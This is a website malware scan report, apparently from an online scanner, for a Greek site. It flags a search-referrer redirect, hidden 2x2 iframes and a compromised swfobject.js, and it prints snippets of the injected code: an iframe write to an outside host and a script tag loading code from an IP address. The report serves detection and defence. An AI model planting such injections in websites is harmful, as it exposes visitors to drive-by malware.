Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://marymatsouka.gr/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: marymatsouka.gr Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: no-cache, no-store, must-revalidate, max-age=0 Connection: close Date: Wed, 27 Aug 2014 15:42:22 GMT Location: http://elyisus.com/hmbs.html Server: LiteSpeed Content-Length: 1148 Content-Type: text/html X-Powered-By: PleskLin | malicious |
Scanned pages/files
Request | Server response | Status |
http://marymatsouka.gr/ | 200 OK Content-Length: 1603 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://elyisus.com/hmbs.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://elyisus.com/hmbs.html> | ||
http://marymatsouka.gr/swfobject.js | 200 OK Content-Length: 7024 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1 document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://elyisus.com/hmbs.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://elyisus.com/hmbs.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://elyisus.com/hmbs.html> | ||
http://marymatsouka.gr/js/swfforcesize.js | 200 OK Content-Length: 2679 Content-Type: text/javascript | suspicious |
Suspicious code found <script type="text/javascript" src="http://146.185.255.88/iframer/generate.php?domain=kolo.ch &type=js"></script> | ||
http://marymatsouka.gr/test404page.js | 404 Not Found Content-Length: 1148 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=marymatsouka.gr
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://marymatsouka.gr/
Result: marymatsouka.gr is not infected or malware details are not published yet.
Result: marymatsouka.gr is not infected or malware details are not published yet.